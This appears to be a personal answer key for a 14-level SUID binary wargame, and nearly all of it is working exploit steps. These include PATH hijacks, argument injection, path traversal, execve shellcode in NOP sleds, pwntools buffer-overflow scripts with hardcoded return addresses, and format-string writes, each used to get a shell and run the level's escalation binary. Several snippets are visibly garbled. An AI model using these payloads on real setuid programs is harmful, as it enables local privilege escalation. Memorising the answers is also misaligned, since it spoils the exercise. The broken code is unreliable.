All challenges are under /var/challenge/levelN, where N is the number of level that starts from 1. All challenge binaries are SUID programs. Your goal is to run each challenge binary, exploit it, get a shell, and then execute l33t to elevate you onto the next level. You must start from level 1.
//level1 exploit Cd to /var/challenge/level1 and run the next command export HOME="/var/challenge/level1" You get a bash shell $ Run l33t and move to level2
//level2 exploit Create a file called tidy Then change the Path variable to your documentary PATH=/home/gooner:$PATH Change permission for tidy using chmod +x tidy In tidy have l33t and save the file Then from /var/challenge/level2 run ./2 /home/gooner/tidy The output should say OK! Move to challenge 3
//level3 exploit #!/bin/bash /var/challenge/level3/3 'level3.sh -exec l33t {} +' Use this in a script and run the file ./file_name
//level4 exploit #!/bin/bash /var/challenge/level4/4 '../../../../../usr/local/bin/l33t' Use this in a script and run the file ./file_name
//level5 exploit Run this command export SHELLCODE=$(python -c 'print "\x90"*100000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"')
Create a file in default location with this code #include <stdio.h> #include <stdlib.h>
int main(int argc, char argv[]) { char ptr = getenv("SHELLCODE"); printf("%p\n", ptr); }
compile it using gcc -m32 filename.c -o output
run ./output (an address will get generated 0x...) and copy the address.
Then go to level5 and Run ./5 11
Run l33t in the bash to move to next level//level 6 exploit Run this command from level6 ./6 uniq $(python -c 'print "A"*256 + "l33t"') Moves to next level
//level7 exploit Create a file called ls in default location Then change the Path variable to your documentary export PATH=/home/gooner:$PATH Change permission for ls using chmod +x ls In ls have l33t and save the file Then from /var/challenge/level7 run ./7 7.cmd The output should list all the files! Move to challenge 8
//level8 exploit Run the following command from /home/gooner export SHELLCODE=$(python -c 'print "\x90"*100000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"') Create a python file in default location with the following code from pwn import * fill_len = 0x10004+4 target = 0xffffd140
p = process(argv=['/var/challenge/level8/8', '-p', '2020']) # Uses TCP by default c = remote('127.0.0.1', 2020)
print c.readuntil('Ready to read!') c.send('A'*fill_len + p32(target) + '\n') c.readuntil('Done!') c.sendline('l33t; touch success;') print c.recvall(timeout=2)
Run the python file. Move to level9
//level9 exploit Create a python file in default location Have the data as follows #!/usr/bin/env python from pwn import * code = 'kJCQ'341 code=code+'k'+'Lv/L3NowesIU2gvYmluieMxyTHSMcCwC82AicOwAc2A6/4=' sc = base64.b64decode(code) env={} env['__SC'] = sc for i in range(5): env[chr(ord('A')+i)(19)] = p32(0xffffdc01)*2 p = process(executable='/var/challenge/level9/9', argv=[], env=env) p.sendline("l33t;exit") print p.recvall()
Run the file and move to level 10
//level10 exploit
Run the following command from default location
export SHELLCODE=$(python -c 'print"\x90"*1000 + "\x31\xc0\x50\x68\x6c\x33\x33\x74\x68\x62\x69\x6e\x2f\x68\x63\x61\x6c\x2f\x68\x72\x2f\x6c\x6f\x68\x2f\x2f\x75\x73\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80"')
Go to /var/challenge/level10 and run
./10
//level11 exploit Run the following code from default location export SHELLCODE=$(python -c 'print"\x90"*1000 + "\x31\xc0\x50\x68\x6c\x33\x33\x74\x68\x62\x69\x6e\x2f\x68\x63\x61\x6c\x2f\x68\x72\x2f\x6c\x6f\x68\x2f\x2f\x75\x73\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80"')
Create a file level11.sh in default location with data
#!/bin/bash
/var/challenge/level11/11 python -c 'print "B"*270+"\xe8\xd6\xff\xff"+"A"*32768' abc
Give permissions and make it executable chmod +x level11.sh Run level11.sh to move to level12
//level12 exploit Run from default location export SHELLCODE=$(python -c 'print "\x90"*100000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"')
Then from /var/challenge/level12
./12 python -c 'print "aa\xeb\x9b\x04\x08\xea\x9b\x04\x08\xe9\x9b\x04\x08\xe8\x9b\x04\x08"+"%231x%70\$hhn%255x%71\$hhn%71\$hhn"'
//level13 Run from default location Shell
Have a bash file called level13.sh and make it executable and have the following contents
#!/bin/bash
export SHELLCODE=$(python -c 'print "\x90"*100000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"')
/var/challenge/level13/13 gooner python -c 'print "\xe8\xd6\xff\xff"*64'
Run From /var/challenges/level13 /home/gooner/level13.sh
//level14 export SHELLCODE=$(python -c 'print "\x90"*100000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"')
Create shell_open.sh file with the following contents and make it executable #!/bin/bash l33t
Create level14.sh file and have the following contents #!/bin/bash export SHELLCODE=$(python -c 'print "\x90"*100000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"')
/var/challenge/level14/14 moresecrets shell_open &
sleep 1
sh -c "find ~ -group lev15 -name ".*" '`l33t`'"
From default location run ./level14.sh Move to level 15